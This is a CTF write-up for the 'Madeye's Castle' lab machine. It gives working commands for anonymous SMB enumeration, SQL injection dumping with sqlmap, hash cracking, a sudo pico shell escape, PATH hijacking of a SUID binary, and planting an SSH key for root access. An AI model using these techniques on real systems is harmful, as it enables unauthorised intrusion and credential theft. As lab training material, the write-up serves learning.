Link to the ctf: Madeye’s Castle

Web Server

By visiting the webpage, we see that the default apache page is changed.

by checking the source code, we get an hint.

Updating the /etc/hosts file we get another webpage that greetes us.

SMB Share

nmap tells us that there’s a Samba service on.

I’m gonna use enum4linux-ng.

The following interesting things that the output it gives us are the following:

There is a Null Session vulnerability. This allows us to “login” without entering a password.

I then used smbmap to enumerate it further.

smbmap -H -u '' -p '' 

sambashare is accessible. The following command is to recursively search for stuff inside a share.

smbmap -H -u '' -p '' -R sambashare

To download the files, we just use the --download argument

smbmap -H -u '' -p '' --download sambashare\\.notes.txt
smbmap -H -u '' -p '' --download sambashare\\spellnames.txt

notes.txt contains the following:

Hagrid told me that spells names are not good since they will not "rock you"
Hermonine loves historical text editors along with reading old books.

and spellnames.txt it apper to be a wordlist.

SQL Injection

I intercepted the login request and passed it to sqlmap I’m using the following sqlmap version: 1.5.2#pip

Fun fact: I had issue with sqlmap. Try to update it or change some arguments.

sqlmap -r request --level 5 --risk 3 --random-agent -T users --dump

I decided to crack this hash since it gives me more detail about it “My linux username is my first name, and password uses best64” so harry is the username, best64 is a rule. I use john to crack the hash.

john --rules=best64 -w=./spellnames.txt --format=Raw-SHA512 hash.txt

We can use the credentials to log in via ssh.

Horizontal Privilege Escalation

By checking harry privileges, we see that we can execute pico as hermonine By using Pico privesc techninques we can spawn a shell as hermonine.

And then I put my ssh-key in /home/hermonine/.ssh/authorized_keys so I can have a better shell.

Vertical privilege escalation

Got stuck here, thinking that I should do something that only hermonine could do.

I checked for SUID files

I used the strings command

and I feel like this binary executes uname -p without specifying the full path for it. We can exploit it by just changing the enviroment path where Linux checks for binaries.

By runnin these commands, we tell linux to check first in our current directory for the linux command that it has to execute. Then I create a bash script called uname

echo "HIJACKED";
whoami; id;

and make it executable

chmod +x uname

but first we have to guess the number. We can actually bypass it since it uses the current time as seed.

#include <stdio.h>
#include <time.h>

int main(){
	printf("%d", rand());
	return 0;

and compile it

gcc rand.c

okay, so we can confirm that we can execute commands as root. The easiest way to get root would be to change /bin/bash’s suid. Or we can write our key to /root/.ssh/authorided_keys.

I’m treating this as a penetration test, so I’d like to not mess things around more than I should, so I’ll write my ssh key being careful to append it to the file.

echo "HIJACKED";
mkdir /root/.ssh; chmod 600 /root/.ssh;
echo -e '\necdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFHMnWdBAAvTFNf4U01x9NjPFAbGWj4f/LyeCZPmHQdp/PH/u71OShS7wZREW9WzV73/TGxuwXYnaU1RJL/5wJc= lmao' >> /root/.ssh/authorized_keys
cat /root/.ssh/authorized_keys

Now we can login as root via ssh.

ssh -i sshkey root@